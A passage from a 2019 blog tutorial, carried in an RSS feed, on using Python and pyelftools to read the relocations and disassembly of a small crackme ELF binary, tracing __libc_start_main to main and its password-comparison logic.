2502<span class="go">0x6ca: hlt</span>
2503<span class="go">... snip ...</span>
2504</code></pre></div>
2505
2506<p>The line in bold is fairly interesting to us. The address at <code>[rip + 0x200916]</code> is equivalent to <code>[0x6ca + 0x200916]</code>, which in turn evaluates to <code>0x200fe0</code>. The first <code>call</code> being made to a function at <code>0x200fe0</code>? What could this function be?</p>
2507
2508<p>For this, we will have to look at <strong>relocations</strong>. Quoting <a href="http://refspecs.linuxbase.org/elf/gabi4+/ch4.reloc.html">linuxbase.org</a></p>
2509
2510<blockquote>
2511 <p>Relocation is the process of connecting symbolic references with symbolic definitions. For example, when a program calls a function, the associated call instruction must transfer control to the proper destination address at execution. Relocatable files must have “relocation entries’’ which are necessary because they contain information that describes how to modify their section contents, thus allowing executable and shared object files to hold the right information for a process’s program image.</p>
2512</blockquote>
2513
2514<p>To try and find these relocation entries, we write a third script.</p>
2515
2516<div class="codehilite"><pre><span></span><code><span class="c1"># relocations.py</span>
2517
2518<span class="kn">import</span> <span class="nn">sys</span>
2519<span class="kn">from</span> <span class="nn">elftools.elf.elffile</span> <span class="kn">import</span> <span class="n">ELFFile</span>
2520<span class="kn">from</span> <span class="nn">elftools.elf.relocation</span> <span class="kn">import</span> <span class="n">RelocationSection</span>
2521
2522<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s1">'./chall.elf'</span><span class="p">,</span> <span class="s1">'rb'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
2523 <span class="n">e</span> <span class="o">=</span> <span class="n">ELFFile</span><span class="p">(</span><span class="n">f</span><span class="p">)</span>
2524 <span class="k">for</span> <span class="n">section</span> <span class="ow">in</span> <span class="n">e</span><span class="o">.</span><span class="n">iter_sections</span><span class="p">():</span>
2525 <span class="k">if</span> <span class="nb">isinstance</span><span class="p">(</span><span class="n">section</span><span class="p">,</span> <span class="n">RelocationSection</span><span class="p">):</span>
2526 <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s1">'</span><span class="si">{section.name}</span><span class="s1">:'</span><span class="p">)</span>
2527 <span class="n">symbol_table</span> <span class="o">=</span> <span class="n">e</span><span class="o">.</span><span class="n">get_section</span><span class="p">(</span><span class="n">section</span><span class="p">[</span><span class="s1">'sh_link'</span><span class="p">])</span>
2528 <span class="k">for</span> <span class="n">relocation</span> <span class="ow">in</span> <span class="n">section</span><span class="o">.</span><span class="n">iter_relocations</span><span class="p">():</span>
2529 <span class="n">symbol</span> <span class="o">=</span> <span class="n">symbol_table</span><span class="o">.</span><span class="n">get_symbol</span><span class="p">(</span><span class="n">relocation</span><span class="p">[</span><span class="s1">'r_info_sym'</span><span class="p">])</span>
2530 <span class="n">addr</span> <span class="o">=</span> <span class="nb">hex</span><span class="p">(</span><span class="n">relocation</span><span class="p">[</span><span class="s1">'r_offset'</span><span class="p">])</span>
2531 <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s1">'</span><span class="si">{symbol.name}</span><span class="s1"> </span><span class="si">{addr}</span><span class="s1">'</span><span class="p">)</span>
2532</code></pre></div>
2533
2534<p>Let’s run through this code real quick. We first loop through the sections, and check if it’s of the type <code>RelocationSection</code>. We then iterate through the relocations from the symbol table for each section. Finally, running this gives us</p>
2535
2536<div class="codehilite"><pre><span></span><code><span class="go">› python relocations.py</span>
2537<span class="go">.rela.dyn:</span>
2538<span class="go"> 0x200d98</span>
2539<span class="go"> 0x200da0</span>
2540<span class="go"> 0x201008</span>
2541<span class="go">_ITM_deregisterTMCloneTable 0x200fd8</span>
2542<span class="go">**__libc_start_main 0x200fe0**</span>
2543<span class="go">__gmon_start__ 0x200fe8</span>
2544<span class="go">_ITM_registerTMCloneTable 0x200ff0</span>
2545<span class="go">__cxa_finalize 0x200ff8</span>
2546<span class="go">stdin 0x201010</span>
2547<span class="go">.rela.plt:</span>
2548<span class="go">puts 0x200fb0</span>
2549<span class="go">printf 0x200fb8</span>
2550<span class="go">fgets 0x200fc0</span>
2551<span class="go">strcmp 0x200fc8</span>
2552<span class="go">malloc 0x200fd0</span>
2553</code></pre></div>
2554
2555<p>Remember the function call at <code>0x200fe0</code> from earlier? Yep, so that was a call to the well known <code>__libc_start_main</code>. Again, according to <a href="http://refspecs.linuxbase.org/LSB_3.1.0/LSB-generic/LSB-generic/baselib—libc-start-main-.html">linuxbase.org</a></p>
2556
2557<blockquote>
2558 <p>The <code>__libc_start_main()</code> function shall perform any necessary initialization of the execution environment, call the <em>main</em> function with appropriate arguments, and handle the return from <code>main()</code>. If the <code>main()</code> function returns, the return value shall be passed to the <code>exit()</code> function.</p>
2559</blockquote>
2560
2561<p>And its definition is like so</p>
2562
2563<div class="codehilite"><pre><span></span><code><span class="kt">int</span> <span class="nf">__libc_start_main</span><span class="p">(</span><span class="kt">int</span> <span class="o">*</span><span class="p">(</span><span class="n">main</span><span class="p">)</span> <span class="p">(</span><span class="kt">int</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span> <span class="o">*</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span> <span class="o">*</span><span class="p">),</span>
2564<span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span> <span class="o">*</span> <span class="n">ubp_av</span><span class="p">,</span>
2565<span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">init</span><span class="p">)</span> <span class="p">(</span><span class="kt">void</span><span class="p">),</span>
2566<span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">fini</span><span class="p">)</span> <span class="p">(</span><span class="kt">void</span><span class="p">),</span>
2567<span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">rtld_fini</span><span class="p">)</span> <span class="p">(</span><span class="kt">void</span><span class="p">),</span>
2568<span class="kt">void</span> <span class="p">(</span><span class="o">*</span> <span class="n">stack_end</span><span class="p">));</span>
2569</code></pre></div>
2570
2571<p>Looking back at our disassembly</p>
2572
2573<pre><code>0x6a0: xor ebp, ebp
25740x6a2: mov r9, rdx
25750x6a5: pop rsi
25760x6a6: mov rdx, rsp
25770x6a9: and rsp, 0xfffffffffffffff0
25780x6ad: push rax
25790x6ae: push rsp
25800x6af: lea r8, [rip + 0x23a]
25810x6b6: lea rcx, [rip + 0x1c3]
2582**0x6bd: lea rdi, [rip + 0xe6]**
25830x6c4: call qword ptr [rip + 0x200916]
25840x6ca: hlt
2585... snip ...
2586</code></pre>
2587
2588<p>but this time, at the <code>lea</code> or Load Effective Address instruction, which loads some address <code>[rip + 0xe6]</code> into the <code>rdi</code> register. <code>[rip + 0xe6]</code> evaluates to <code>0x7aa</code> which happens to be the address of our <code>main()</code> function! How do I know that? Because <code>__libc_start_main()</code>, after doing whatever it does, eventually jumps to the function at <code>rdi</code>, which is generally the <code>main()</code> function. It looks something like this</p>
2589
2590<p><img src="https://cdn-images-1.medium.com/max/800/0*oQA2MwHjhzosF8ZH.png" alt="" /></p>
2591
2592<p>To see the disassembly of <code>main</code>, seek to <code>0x7aa</code> in the output of the script we’d written earlier (<code>disas1.py</code>).</p>
2593
2594<p>From what we discovered earlier, each <code>call</code> instruction points to some function which we can see from the relocation entries. So following each <code>call</code> into their relocations gives us this</p>
2595
2596<pre><code>printf 0x650
2597fgets 0x660
2598strcmp 0x670
2599malloc 0x680
2600</code></pre>
2601
2602<p>Putting all this together, things start falling into place. Let me highlight the key sections of the disassembly here. It’s pretty self-explanatory.</p>
2603
2604<pre><code>0x7b2: mov edi, 0xa ; 10
26050x7b7: call 0x680 ; malloc
2606</code></pre>
2607
2608<p>The loop to populate the <code>*pw</code> string</p>
2609
2610<pre><code>0x7d0: mov eax, dword ptr [rbp - 0x14]
26110x7d3: cdqe
26120x7d5: lea rdx, [rax - 1]
26130x7d9: mov rax, qword ptr [rbp - 0x10]
26140x7dd: add rax, rdx
26150x7e0: movzx eax, byte ptr [rax]
26160x7e3: lea ecx, [rax + 1]
26170x7e6: mov eax, dword ptr [rbp - 0x14]
26180x7e9: movsxd rdx, eax
26190x7ec: mov rax, qword ptr [rbp - 0x10]
26200x7f0: add rax, rdx
26210x7f3: mov edx, ecx
26220x7f5: mov byte ptr [rax], dl
26230x7f7: add dword ptr [rbp - 0x14], 1
26240x7fb: cmp dword ptr [rbp - 0x14], 8
26250x7ff: jle 0x7d0
2626</code></pre>
2627
2628<p>And this looks like our <code>strcmp()</code></p>
2629
2630<pre><code>0x843: mov rdx, qword ptr [rbp - 0x10] ; *in
26310x847: mov rax, qword ptr [rbp - 8] ; *pw
26320x84b: mov rsi, rdx
26330x84e: mov rdi, rax
26340x851: call 0x670 ; strcmp
26350x856: test eax, eax ; is = 0?
26360x858: jne 0x868 ; no? jump to 0x868
26370x85a: lea rdi, [rip + 0xae] ; "haha yes!"
26380x861: call 0x640 ; puts
26390x866: jmp 0x874
26400x868: lea rdi, [rip + 0xaa] ; "nah dude"
26410x86f: call 0x640 ; puts
2642</code></pre>
2643
2644<p>I’m not sure why it uses <code>puts</code> here? I might be missing something; perhaps <code>printf</code> calls <code>puts</code>. I could be wrong. I also confirmed with radare2 that those locations are actually the strings “haha yes!” and “nah dude”.</p>
2645
2646<p><strong>Update</strong>: It’s because of compiler optimization. A <code>printf()</code> (in this case) is seen as a bit overkill, and hence gets simplified to a <code>puts()</code>.</p>
2647
2648<h2 id="conclusion">Conclusion</h2>
2649
2650<p>Wew, that took quite some time. But we’re done. If you’re a beginner, you might find this extremely confusing, or probably didn’t even understand what was going on. And that’s okay. Building an intuition for reading and grokking disassembly comes with practice. I’m no good at it either.</p>
2651
2652<p>All the code used in this post is here: <a href="https://github.com/icyphox/asdf/tree/master/reversing-elf">https://github.com/icyphox/asdf/tree/master/reversing-elf</a></p>
2653
2654<p>Ciao for now, and I’ll see ya in #2 of this series—PE binaries. Whenever that is.</p>
2655]]></description><link>https://icyphox.sh/blog/python-for-re-1</link><pubDate>Fri, 08 Feb 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/python-for-re-1</guid></item></channel>
2656</rss>